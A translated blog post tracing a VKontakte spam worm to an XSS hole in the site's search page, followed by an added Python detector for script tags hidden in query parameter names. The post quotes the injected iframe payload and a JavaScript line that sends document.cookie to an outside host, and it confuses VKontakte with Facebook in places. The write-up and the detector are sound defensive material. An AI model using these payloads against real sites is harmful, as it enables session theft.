13:03 How to become a VKontakte spam peddler out of curiosity
Just a few minutes ago I managed to send 200+ messages to my VKontakte friends. It was, of course, spam, and it read as follows:

"Hi, I am deleting this contact, far too much spam comes in (( I am deleting my page now; if you need anything, call me on my mobile phone or look for me here: vkontakte.ru/away.php?to=... I have my own page there under my name. This is not spam, send it on to all my friends..."

My surprise came from the fact that:

1. I use Linux, and only Linux, wherever possible.
2. I use VKontakte only at home and, again, purely from Linux.
3. Facebook and the mail account tied to it have sufficiently cryptographically strong passwords of 10+ characters, letters and digits. Yes, I'm paranoid.

Important: for your own safety, I advise following any of the links out of this article only while logged out of Facebook.

First I decided to see where the link I had sent out leads. It led to the site vk-foto.ru, which immediately redirected to odnonochniki.ru/?rid=484

I decided to start with an analysis of "odnonochniki". Still, nothing malicious turned up.

"Hmm," said the harsh Siberian men. I closed Opera and opened Firefox. As a first step, I disabled META redirects in the Web Developer Toolbar and enabled Firebug for vk-foto.ru. After checking my VKontakte login state in Firefox, I went to the site. Analyzing the HTML quickly turned up what I was looking for:

    <iframe src='http://vk-foto.ru/2/1.php' style='display: none;'></iframe>

Already anticipating the answer, I typed in that address and got ... an Apache 404.

Well, then I had to dig deeper. I enabled Firebug's Net panel for vk-foto, reloaded the page and watched what was being loaded.

Seeing the result, I cursed myself in the strongest terms, and for good reason:

1. Not everything that looks like an Apache 404 is one. Always look at the HTTP return code.
2. After seeing "404" I did not even bother to look at the code.

So, another iframe:

    <iframe src=vkontakte.ru/gsearch.php?from=ads&section=ads&c[type]=1&c[%22%3E%3Cscript%20%20src%20%3d%20http://webzer.vov.ru/vk.js%20%20%3E%3C/script%3E]=2 width='0' height='0' style='display: none'></iframe>

Hm. Now this looks like an XSS in VKontakte. An external JavaScript file gets loaded into the search page. Its contents are as simple as an orange:

    location.href = 'http://webzer.vov.ru/css/log.php?' + document.cookie

So the Facebook cookies go off to a third-party host.

What follows from all this:
DISCLAIMER: I am well aware that I have told information security professionals nothing new. This post is aimed more at ordinary IT folks, and is meant to keep them from stepping on the same rake I did.
_________
The text was drafted in HabraRedaktore
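
A defensive check for the pattern in the second iframe above, as an added example that is not part of the original post: the script tag there is carried inside a parameter name (the array key of c[...]) rather than in a value, so this Python code percent-decodes both the names and the values of a request URL and flags markup in either. The sample URLs are constructed, evil.example is a placeholder host, and the function names are hypothetical.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

MARKUP = re.compile(r'[<>"]')               # can break out of a tag or attribute
SCRIPT_TAG = re.compile(r"<\s*script", re.I)

def fully_decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen too."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def suspicious_params(url):
    """Return (part, decoded_text, severity) for each query name or value with markup."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # Check the parameter NAME as well: in the iframe above the payload
        # sits inside the array key c[...], and the value is just "2".
        for part, raw in (("name", name), ("value", value)):
            text = fully_decode(raw)
            if SCRIPT_TAG.search(text):
                findings.append((part, text, "script"))
            elif MARKUP.search(text):
                findings.append((part, text, "markup"))
    return findings

def reflect(text):
    """HTML-encode a parameter name or value before echoing it into a page."""
    return html.escape(text, quote=True)

# Constructed request URLs (evil.example is a placeholder host).
BENIGN = "http://vkontakte.ru/gsearch.php?from=ads&section=ads&c[type]=1&c[name]=2"
INJECTED = ("http://vkontakte.ru/gsearch.php?from=ads&section=ads&c[type]=1"
            "&c[%22%3E%3Cscript%20src%3dhttp://evil.example/vk.js%3E%3C/script%3E]=2")
DOUBLE = "http://vkontakte.ru/gsearch.php?q=%253Cscript%253E"

if __name__ == "__main__":
    for url in (BENIGN, INJECTED, DOUBLE):
        print(suspicious_params(url))
    print(reflect(suspicious_params(INJECTED)[0][1]))
```

The same rule applies on the output side: whatever the search page echoes back, names included, goes through reflect() or its equivalent first.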